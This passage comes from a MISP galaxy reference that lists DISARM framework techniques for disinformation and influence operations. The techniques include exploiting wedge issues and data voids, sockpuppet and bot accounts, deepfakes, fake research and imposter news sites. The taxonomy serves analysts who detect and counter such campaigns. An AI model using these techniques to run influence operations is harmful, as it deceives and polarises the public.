Favourable position on the international stage in terms of great power politics or regional rivalry. Geopolitics plays out in the realms of foreign policy, national security, diplomacy, and intelligence. It involves nation-state governments, heads of state, foreign ministers, intergovernmental organisations, and regional security alliances.

The tag is: misp-galaxy:disarm-techniques="Geopolitical Advantage"

Table 1319. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.001.md

Domestic Political Advantage

Favourable position vis-à-vis national or sub-national political opponents such as political parties, interest groups, politicians, candidates.

The tag is: misp-galaxy:disarm-techniques="Domestic Political Advantage"

Table 1320. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.002.md

Economic Advantage

Favourable position domestically or internationally in the realms of commerce, trade, finance, industry. Economics involves nation-states, corporations, banks, trade blocs, industry associations, cartels.

The tag is: misp-galaxy:disarm-techniques="Economic Advantage"

Table 1321. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.003.md

Ideological Advantage

Favourable position domestically or internationally in the market for ideas, beliefs, and world views. Competition plays out among faith systems, political systems, and value systems. It can involve sub-national, national or supra-national movements.

The tag is: misp-galaxy:disarm-techniques="Ideological Advantage"

Table 1322. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.004.md

Dismiss

Push back against criticism by dismissing your critics. This might be arguing that the critics use a different standard for you than with other actors or themselves; or arguing that their criticism is biassed.

The tag is: misp-galaxy:disarm-techniques="Dismiss"

Table 1323. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0075.md

Discredit Credible Sources

Plan to delegitimize the media landscape and degrade public trust in reporting, by discrediting credible sources. This makes it easier to promote influence operation content.

The tag is: misp-galaxy:disarm-techniques="Discredit Credible Sources"

Table 1324. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0075.001.md

Distort

Twist the narrative. Take information, or artefacts like images, and change the framing around them.

The tag is: misp-galaxy:disarm-techniques="Distort"

Table 1325. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0076.md

Distract

Shift attention to a different narrative or actor, for instance by accusing critics of the same activity that they’ve accused you of (e.g. police brutality).

The tag is: misp-galaxy:disarm-techniques="Distract"

Table 1326. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0077.md

Dismay

Threaten the critic or narrator of events. For instance, threaten journalists or news outlets reporting on a story.

The tag is: misp-galaxy:disarm-techniques="Dismay"

Table 1327. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0078.md

Divide

Create conflict between subgroups, to widen divisions in a community

The tag is: misp-galaxy:disarm-techniques="Divide"

Table 1328. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0079.md

Map Target Audience Information Environment

Mapping the target audience information environment analyses the information space itself, including social media analytics, web traffic, and media surveys. Mapping the information environment may help the influence operation determine the most realistic and popular information channels to reach its target audience. Mapping the target audience information environment aids influence operations in determining the most vulnerable areas of the information space to target with messaging.

The tag is: misp-galaxy:disarm-techniques="Map Target Audience Information Environment"

Table 1329. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.md

Monitor Social Media Analytics

An influence operation may use social media analytics to determine which factors will increase the operation content’s exposure to its target audience on social media platforms, including views, interactions, and sentiment relating to topics and content types. The social media platform itself or a third-party tool may collect the metrics.

The tag is: misp-galaxy:disarm-techniques="Monitor Social Media Analytics"

Table 1330. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.001.md

Evaluate Media Surveys

An influence operation may evaluate its own or third-party media surveys to determine what type of content appeals to its target audience. Media surveys may provide insight into an audience’s political views, social class, general interests, or other indicators used to tailor operation messaging to its target audience.

The tag is: misp-galaxy:disarm-techniques="Evaluate Media Surveys"

Table 1331. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.002.md

An influence operation may identify trending hashtags on social media platforms for later use in boosting operation content. A hashtag40 refers to a word or phrase preceded by the hash symbol (#) on social media used to identify messages and posts relating to a specific topic. All public posts that use the same hashtag are aggregated onto a centralised page dedicated to the word or phrase and sorted either chronologically or by popularity.

The tag is: misp-galaxy:disarm-techniques="Identify Trending Topics/Hashtags"

Table 1332. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.003.md

Conduct Web Traffic Analysis

An influence operation may conduct web traffic analysis to determine which search engines, keywords, websites, and advertisements gain the most traction with its target audience.

The tag is: misp-galaxy:disarm-techniques="Conduct Web Traffic Analysis"

Table 1333. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.004.md

Assess Degree/Type of Media Access

An influence operation may survey a target audience’s Internet availability and degree of media freedom to determine which target audience members will have access to operation content and on which platforms. An operation may face more difficulty targeting an information environment with heavy restrictions and media control than an environment with independent media, freedom of speech and of the press, and individual liberties.

The tag is: misp-galaxy:disarm-techniques="Assess Degree/Type of Media Access"

Table 1334. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.005.md

Identify Social and Technical Vulnerabilities

Identifying social and technical vulnerabilities determines weaknesses within the target audience information environment for later exploitation. Vulnerabilities include decisive political issues, weak cybersecurity infrastructure, search engine data voids, and other technical and non technical weaknesses in the target information environment. Identifying social and technical vulnerabilities facilitates the later exploitation of the identified weaknesses to advance operation objectives.

The tag is: misp-galaxy:disarm-techniques="Identify Social and Technical Vulnerabilities"

Table 1335. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.md

Find Echo Chambers

Find or plan to create areas (social media groups, search term groups, hashtag groups etc) where individuals only engage with people they agree with.

The tag is: misp-galaxy:disarm-techniques="Find Echo Chambers"

Table 1336. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.001.md

Identify Data Voids

A data void refers to a word or phrase that results in little, manipulative, or low-quality search engine data. Data voids are hard to detect and relatively harmless until exploited by an entity aiming to quickly proliferate false or misleading information during a phenomenon that causes a high number of individuals to query the term or phrase. In the Plan phase, an influence operation may identify data voids for later exploitation in the operation. A 2019 report by Michael Golebiewski identifies five types of data voids. (1) “Breaking news” data voids occur when a keyword gains popularity during a short period of time, allowing an influence operation to publish false content before legitimate news outlets have an opportunity to publish relevant information. (2) An influence operation may create a “strategic new terms” data void by creating their own terms and publishing information online before promoting their keyword to the target audience. (3) An influence operation may publish content on “outdated terms” that have decreased in popularity, capitalising on most search engines’ preferences for recency. (4) “Fragmented concepts” data voids separate connections between similar ideas, isolating segment queries to distinct search engine results. (5) An influence operation may use “problematic queries” that previously resulted in disturbing or inappropriate content to promote messaging until mainstream media recontextualizes the term.

The tag is: misp-galaxy:disarm-techniques="Identify Data Voids"

Table 1337. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.002.md

Identify Existing Prejudices

An influence operation may exploit existing racial, religious, demographic, or social prejudices to further polarise its target audience from the rest of the public.

The tag is: misp-galaxy:disarm-techniques="Identify Existing Prejudices"

Table 1338. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.003.md

Identify Existing Fissures

An influence operation may identify existing fissures to pit target populations against one another or facilitate a “divide-and-conquer" approach to tailor operation narratives along the divides.

The tag is: misp-galaxy:disarm-techniques="Identify Existing Fissures"

Table 1339. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.004.md

Identify Existing Conspiracy Narratives/Suspicions

An influence operation may assess preexisting conspiracy theories or suspicions in a population to identify existing narratives that support operational objectives.

The tag is: misp-galaxy:disarm-techniques="Identify Existing Conspiracy Narratives/Suspicions"

Table 1340. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.005.md

Identify Wedge Issues

A wedge issue is a divisive political issue, usually concerning a social phenomenon, that divides individuals along a defined line. An influence operation may exploit wedge issues by intentionally polarising the public along the wedge issue line and encouraging opposition between factions.

The tag is: misp-galaxy:disarm-techniques="Identify Wedge Issues"

Table 1341. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.006.md

Identify Target Audience Adversaries

An influence operation may identify or create a real or imaginary adversary to centre operation narratives against. A real adversary may include certain politicians or political parties while imaginary adversaries may include falsified “deep state”62 actors that, according to conspiracies, run the state behind public view.

The tag is: misp-galaxy:disarm-techniques="Identify Target Audience Adversaries"

Table 1342. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.007.md

Identify Media System Vulnerabilities

An influence operation may exploit existing weaknesses in a target’s media system. These weaknesses may include existing biases among media agencies, vulnerability to false news agencies on social media, or existing distrust of traditional media sources. An existing distrust among the public in the media system’s credibility holds high potential for exploitation by an influence operation when establishing alternative news agencies to spread operation content.

The tag is: misp-galaxy:disarm-techniques="Identify Media System Vulnerabilities"

Table 1343. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.008.md

Develop New Narratives

Actors may develop new narratives to further strategic or tactical goals, especially when existing narratives adequately align with the campaign goals. New narratives provide more control in terms of crafting the message to achieve specific goals. However, new narratives may require more effort to disseminate than adapting or adopting existing narratives.

The tag is: misp-galaxy:disarm-techniques="Develop New Narratives"

Table 1344. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0082.md

Integrate Target Audience Vulnerabilities into Narrative

An influence operation may seek to exploit the preexisting weaknesses, fears, and enemies of the target audience for integration into the operation’s narratives and overall strategy. Integrating existing vulnerabilities into the operational approach conserves resources by exploiting already weak areas of the target information environment instead of forcing the operation to create new vulnerabilities in the environment.

The tag is: misp-galaxy:disarm-techniques="Integrate Target Audience Vulnerabilities into Narrative"

Table 1345. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0083.md

Reuse Existing Content

When an operation recycles content from its own previous operations or plagiarises from external operations. An operation may launder information to conserve resources that would have otherwise been utilised to develop new content.

The tag is: misp-galaxy:disarm-techniques="Reuse Existing Content"

Table 1346. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.md

Use Copypasta

Copypasta refers to a piece of text that has been copied and pasted multiple times across various online platforms. A copypasta’s final form may differ from its original source text as users add, delete, or otherwise edit the content as they repost the text.

The tag is: misp-galaxy:disarm-techniques="Use Copypasta"

Table 1347. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.001.md

Plagiarise Content

An influence operation may take content from other sources without proper attribution. This content may be either misinformation content shared by others without malicious intent but now leveraged by the campaign as disinformation or disinformation content from other sources.

The tag is: misp-galaxy:disarm-techniques="Plagiarise Content"

Table 1348. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.002.md

Deceptively Labelled or Translated

An influence operation may take authentic content from other sources and add deceptive labels or deceptively translate the content into other langauges.

The tag is: misp-galaxy:disarm-techniques="Deceptively Labelled or Translated"

Table 1349. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.003.md

Appropriate Content

An influence operation may take content from other sources with proper attribution. This content may be either misinformation content shared by others without malicious intent but now leveraged by the campaign as disinformation or disinformation content from other sources. Examples include the appropriation of content from one inauthentic news site to another inauthentic news site or network in ways that align with the originators licencing or terms of service.

The tag is: misp-galaxy:disarm-techniques="Appropriate Content"

Table 1350. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.004.md

Develop Text-Based Content

Creating and editing false or misleading text-based artefacts, often aligned with one or more specific narratives, for use in a disinformation campaign.

The tag is: misp-galaxy:disarm-techniques="Develop Text-Based Content"

Table 1351. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.md

Develop AI-Generated Text

AI-generated texts refers to synthetic text composed by computers using text-generating AI technology. Autonomous generation refers to content created by a bot without human input, also known as bot-created content generation. Autonomous generation represents the next step in automation after language generation and may lead to automated journalism. An influence operation may use read fakes or autonomous generation to quickly develop and distribute content to the target audience.

The tag is: misp-galaxy:disarm-techniques="Develop AI-Generated Text"

Table 1352. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.001.md

Develop Inauthentic News Articles

An influence operation may develop false or misleading news articles aligned to their campaign goals or narratives.

The tag is: misp-galaxy:disarm-techniques="Develop Inauthentic News Articles"

Table 1353. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.003.md

Develop Document

Produce text in the form of a document.

The tag is: misp-galaxy:disarm-techniques="Develop Document"

Table 1354. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.004.md

Develop Book

Produce text content in the form of a book. 

This technique covers both e-books and physical books, however, the former is more easily deployed by threat actors given the lower cost to develop.

The tag is: misp-galaxy:disarm-techniques="Develop Book"

Table 1355. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.005.md

Develop Opinion Article

Opinion articles (aka “Op-Eds” or “Editorials”) are articles or regular columns flagged as “opinion” posted to news sources, and can be contributed by people outside the organisation. 

Flagging articles as opinions allow news organisations to distinguish them from the typical expectations of objective news reporting while distancing the presented opinion from the organisation or its employees.

The use of this technique is not by itself an indication of malicious or inauthentic content; Op-eds are a common format in media. However, threat actors exploit op-eds to, for example, submit opinion articles to local media to promote their narratives.

Examples from the perspective of a news site involve publishing op-eds from perceived prestigious voices to give legitimacy to an inauthentic publication, or supporting causes by hosting op-eds from actors aligned with the organisation’s goals.

The tag is: misp-galaxy:disarm-techniques="Develop Opinion Article"

Table 1356. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.006.md

Create Fake Research

Create fake academic research. Example: fake social science research is often aimed at hot-button social issues such as gender, race and sexuality. Fake science research can target Climate Science debate or pseudoscience like anti-vaxx.

This Technique previously used the ID T0019.001

The tag is: misp-galaxy:disarm-techniques="Create Fake Research"

Table 1357. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.007.md

Develop Image-Based Content

Creating and editing false or misleading visual artefacts, often aligned with one or more specific narratives, for use in a disinformation campaign. This may include photographing staged real-life situations, repurposing existing digital images, or using image creation and editing technologies.

The tag is: misp-galaxy:disarm-techniques="Develop Image-Based Content"

Table 1358. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.md

Develop Memes

Memes are one of the most important single artefact types in all of computational propaganda. Memes in this framework denotes the narrow image-based definition. But that naming is no accident, as these items have most of the important properties of Dawkins' original conception as a self-replicating unit of culture. Memes pull together reference and commentary; image and narrative; emotion and message. Memes are a powerful tool and the heart of modern influence campaigns.

The tag is: misp-galaxy:disarm-techniques="Develop Memes"

Table 1359. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.001.md

Develop AI-Generated Images (Deepfakes)

Deepfakes refer to AI-generated falsified photos, videos, or soundbites. An influence operation may use deepfakes to depict an inauthentic situation by synthetically recreating an individual’s face, body, voice, and physical gestures.

The tag is: misp-galaxy:disarm-techniques="Develop AI-Generated Images (Deepfakes)"

Table 1360. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.002.md

Deceptively Edit Images (Cheap Fakes)

Cheap fakes utilise less sophisticated measures of altering an image, video, or audio for example, slowing, speeding, or cutting footage to create a false context surrounding an image or event.

The tag is: misp-galaxy:disarm-techniques="Deceptively Edit Images (Cheap Fakes)"

Table 1361. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.003.md

Aggregate Information into Evidence Collages

Image files that aggregate positive evidence (Joan Donovan)

The tag is: misp-galaxy:disarm-techniques="Aggregate Information into Evidence Collages"

Table 1362. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.004.md

Develop Video-Based Content

Creating and editing false or misleading video artefacts, often aligned with one or more specific narratives, for use in a disinformation campaign. This may include staging videos of purportedly real situations, repurposing existing video artefacts, or using AI-generated video creation and editing technologies (including deepfakes).

The tag is: misp-galaxy:disarm-techniques="Develop Video-Based Content"

Table 1363. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0087.md

Develop AI-Generated Videos (Deepfakes)

Deepfakes refer to AI-generated falsified photos, videos, or soundbites. An influence operation may use deepfakes to depict an inauthentic situation by synthetically recreating an individual’s face, body, voice, and physical gestures.

The tag is: misp-galaxy:disarm-techniques="Develop AI-Generated Videos (Deepfakes)"

Table 1364. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0087.001.md

Deceptively Edit Video (Cheap Fakes)

Cheap fakes utilise less sophisticated measures of altering an image, video, or audio for example, slowing, speeding, or cutting footage to create a false context surrounding an image or event.

The tag is: misp-galaxy:disarm-techniques="Deceptively Edit Video (Cheap Fakes)"

Table 1365. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0087.002.md

Develop Audio-Based Content

Creating and editing false or misleading audio artefacts, often aligned with one or more specific narratives, for use in a disinformation campaign. This may include creating completely new audio content, repurposing existing audio artefacts (including cheap fakes), or using AI-generated audio creation and editing technologies (including deepfakes).

The tag is: misp-galaxy:disarm-techniques="Develop Audio-Based Content"

Table 1366. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0088.md

Develop AI-Generated Audio (Deepfakes)

Deepfakes refer to AI-generated falsified photos, videos, or soundbites. An influence operation may use deepfakes to depict an inauthentic situation by synthetically recreating an individual’s face, body, voice, and physical gestures.

The tag is: misp-galaxy:disarm-techniques="Develop AI-Generated Audio (Deepfakes)"

Table 1367. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0088.001.md

Deceptively Edit Audio (Cheap Fakes)

Cheap fakes utilise less sophisticated measures of altering an image, video, or audio for example, slowing, speeding, or cutting footage to create a false context surrounding an image or event.

The tag is: misp-galaxy:disarm-techniques="Deceptively Edit Audio (Cheap Fakes)"

Table 1368. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0088.002.md

Obtain Private Documents

Procuring documents that are not publicly available, by whatever means — whether legal or illegal, highly-resourced or less so. These documents can include authentic non-public documents, authentic non-public documents have been altered, or inauthentic documents intended to appear as if they are authentic non-public documents. All of these types of documents can be "leaked" during later stages in the operation.

The tag is: misp-galaxy:disarm-techniques="Obtain Private Documents"

Table 1369. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0089.md

Obtain Authentic Documents

Procure authentic documents that are not publicly available, by whatever means — whether legal or illegal, highly-resourced or less so. These documents can be "leaked" during later stages in the operation.

The tag is: misp-galaxy:disarm-techniques="Obtain Authentic Documents"

Table 1370. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0089.001.md

Alter Authentic Documents

Alter authentic documents (public or non-public) to achieve campaign goals. The altered documents are intended to appear as if they are authentic and can be "leaked" during later stages in the operation.

The tag is: misp-galaxy:disarm-techniques="Alter Authentic Documents"

Table 1371. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0089.003.md

Create Inauthentic Accounts

Inauthentic accounts include bot accounts, cyborg accounts, sockpuppet accounts, and anonymous accounts.

The tag is: misp-galaxy:disarm-techniques="Create Inauthentic Accounts"

Table 1372. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.md

Create Anonymous Accounts

Anonymous accounts or anonymous users refer to users that access network resources without providing a username or password. An influence operation may use anonymous accounts to spread content without direct attribution to the operation.

The tag is: misp-galaxy:disarm-techniques="Create Anonymous Accounts"

Table 1373. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.001.md

Create Cyborg Accounts

Cyborg accounts refer to partly manned, partly automated social media accounts. Cyborg accounts primarily act as bots, but a human operator periodically takes control of the account to engage with real social media users by responding to comments and posting original content. Influence operations may use cyborg accounts to reduce the amount of direct human input required to maintain a regular account but increase the apparent legitimacy of the cyborg account by occasionally breaking its bot-like behaviour with human interaction.

The tag is: misp-galaxy:disarm-techniques="Create Cyborg Accounts"

Table 1374. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.002.md

Create Bot Accounts

Bots refer to autonomous internet users that interact with systems or other users while imitating traditional human behaviour. Bots use a variety of tools to stay active without direct human operation, including artificial intelligence and big data analytics. For example, an individual may programme a Twitter bot to retweet a tweet every time it contains a certain keyword or hashtag. An influence operation may use bots to increase its exposure and artificially promote its content across the internet without dedicating additional time or human resources. Amplifier bots promote operation content through reposts, shares, and likes to increase the content’s online popularity. Hacker bots are traditionally covert bots running on computer scripts that rarely engage with users and work primarily as agents of larger cyberattacks, such as a Distributed Denial of Service attacks. Spammer bots are programmed to post content on social media or in comment sections, usually as a supplementary tool. Impersonator bots102 pose as real people by mimicking human behaviour, complicating their detection.

The tag is: misp-galaxy:disarm-techniques="Create Bot Accounts"

Table 1375. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.003.md

Create Sockpuppet Accounts

Sockpuppet accounts refer to falsified accounts that either promote the influence operation’s own material or attack critics of the material online. Individuals who control sockpuppet accounts also man at least one other user account.67 Sockpuppet accounts help legitimise operation narratives by providing an appearance of external support for the material and discrediting opponents of the operation.

The tag is: misp-galaxy:disarm-techniques="Create Sockpuppet Accounts"

Table 1376. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.004.md

Recruit Malign Actors

Operators recruit bad actors paying recruiting, or exerting control over individuals includes trolls, partisans, and contractors.

The tag is: misp-galaxy:disarm-techniques="Recruit Malign Actors"

Table 1377. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0091.md

Recruit Contractors

Operators recruit paid contractor to support the campaign.

The tag is: misp-galaxy:disarm-techniques="Recruit Contractors"

Table 1378. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0091.001.md

Recruit Partisans

Operators recruit partisans (ideologically-aligned individuals) to support the campaign.

The tag is: misp-galaxy:disarm-techniques="Recruit Partisans"

Table 1379. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0091.002.md

Enlist Troll Accounts

An influence operation may hire trolls, or human operators of fake accounts that aim to provoke others by posting and amplifying content about controversial issues. Trolls can serve to discredit an influence operation’s opposition or bring attention to the operation’s cause through debate. Classic trolls refer to regular people who troll for personal reasons, such as attention-seeking or boredom. Classic trolls may advance operation narratives by coincidence but are not directly affiliated with any larger operation. Conversely, hybrid trolls act on behalf of another institution, such as a state or financial organisation, and post content with a specific ideological goal. Hybrid trolls may be highly advanced and institutionalised or less organised and work for a single individual.

The tag is: misp-galaxy:disarm-techniques="Enlist Troll Accounts"

Table 1380. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0091.003.md

Build Network

Operators build their own network, creating links between accounts — whether authentic or inauthentic — in order amplify and promote narratives and artefacts, and encourage further growth of ther network, as well as the ongoing sharing and engagement with operational content.

The tag is: misp-galaxy:disarm-techniques="Build Network"

Table 1381. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0092.md

Create Organisations

Influence operations may establish organisations with legitimate or falsified hierarchies, staff, and content to structure operation assets, provide a sense of legitimacy to the operation, or provide institutional backing to operation activities.

The tag is: misp-galaxy:disarm-techniques="Create Organisations"

Table 1382. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0092.001.md

Use Follow Trains

A follow train is a group of people who follow each other on a social media platform, often as a way for an individual or campaign to grow its social media following. Follow trains may be a violation of platform Terms of Service. They are also known as follow-for-follow groups.

The tag is: misp-galaxy:disarm-techniques="Use Follow Trains"

Table 1383. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0092.002.md

Create Community or Sub-Group

When there is not an existing community or sub-group that meets a campaign’s goals, an influence operation may seek to create a community or sub-group.

The tag is: misp-galaxy:disarm-techniques="Create Community or Sub-Group"

Table 1384. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0092.003.md

Acquire/Recruit Network

Operators acquire an existing network by paying, recruiting, or exerting control over the leaders of the existing network.

The tag is: misp-galaxy:disarm-techniques="Acquire/Recruit Network"

Table 1385. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0093.md

Fund Proxies

An influence operation may fund proxies, or external entities that work for the operation. An operation may recruit/train users with existing sympathies towards the operation’s narratives and/or goals as proxies. Funding proxies serves various purposes including: - Diversifying operation locations to complicate attribution - Reducing the workload for direct operation assets

The tag is: misp-galaxy:disarm-techniques="Fund Proxies"

Table 1386. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0093.001.md

Acquire Botnets

A botnet is a group of bots that can function in coordination with each other.

The tag is: misp-galaxy:disarm-techniques="Acquire Botnets"

Table 1387. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0093.002.md

Infiltrate Existing Networks

Operators deceptively insert social assets into existing networks as group members in order to influence the members of the network and the wider information environment that the network impacts.

The tag is: misp-galaxy:disarm-techniques="Infiltrate Existing Networks"

Table 1388. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0094.md

Identify Susceptible Targets in Networks

When seeking to infiltrate an existing network, an influence operation may identify individuals and groups that might be susceptible to being co-opted or influenced.

The tag is: misp-galaxy:disarm-techniques="Identify Susceptible Targets in Networks"

Table 1389. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0094.001.md

Utilise Butterfly Attacks

Butterfly attacks occur when operators pretend to be members of a certain social group, usually a group that struggles for representation. An influence operation may mimic a group to insert controversial statements into the discourse, encourage the spread of operation content, or promote harassment among group members. Unlike astroturfing, butterfly attacks aim to infiltrate and discredit existing grassroots movements, organisations, and media campaigns.

The tag is: misp-galaxy:disarm-techniques="Utilise Butterfly Attacks"

Table 1390. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0094.002.md

Develop Owned Media Assets

An owned media asset refers to an agency or organisation through which an influence operation may create, develop, and host content and narratives. Owned media assets include websites, blogs, social media pages, forums, and other platforms that facilitate the creation and organisation of content.

The tag is: misp-galaxy:disarm-techniques="Develop Owned Media Assets"

Table 1391. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0095.md

Leverage Content Farms

Using the services of large-scale content providers for creating and amplifying campaign artefacts at scale.

The tag is: misp-galaxy:disarm-techniques="Leverage Content Farms"

Table 1392. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0096.md

Create Content Farms

An influence operation may create an organisation for creating and amplifying campaign artefacts at scale.

The tag is: misp-galaxy:disarm-techniques="Create Content Farms"

Table 1393. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0096.001.md

Outsource Content Creation to External Organisations

An influence operation may outsource content creation to external companies to avoid attribution, increase the rate of content creation, or improve content quality, i.e., by employing an organisation that can create content in the target audience’s native language. Employed organisations may include marketing companies for tailored advertisements or external content farms for high volumes of targeted media.

The tag is: misp-galaxy:disarm-techniques="Outsource Content Creation to External Organisations"

Table 1394. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0096.002.md

Create Personas

Creating fake people, often with accounts across multiple platforms. These personas can be as simple as a name, can contain slightly more background like location, profile pictures, backstory, or can be effectively backstopped with indicators like fake identity documents.

The tag is: misp-galaxy:disarm-techniques="Create Personas"

Table 1395. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0097.md

Produce Evidence for Persona

People may produce evidence which supports the persona they are deploying (T0097) (aka “backstopping” the persona).

This Technique covers situations where evidence is developed or produced as part of an influence operation to increase the perceived legitimacy of a persona used during IO, including creating accounts for the same persona on multiple platforms.

The use of personas (T0097), and providing evidence to improve people’s perception of one’s persona (T0097.001), are not necessarily malicious or inauthentic. However, sometimes people use personas to increase the perceived legitimacy of narratives for malicious purposes.

This Technique was previously called Backstop Personas.

The tag is: misp-galaxy:disarm-techniques="Produce Evidence for Persona"

Table 1396. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0097.001.md

Establish Inauthentic News Sites

Modern computational propaganda makes use of a cadre of imposter news sites spreading globally. These sites, sometimes motivated by concerns other than propaganda—​for instance, click-based revenue—​often have some superficial markers of authenticity, such as naming and site-design. But many can be quickly exposed with reference to their owenership, reporting history and adverstising details.

The tag is: misp-galaxy:disarm-techniques="Establish Inauthentic News Sites"

Table 1397. Table References

Links

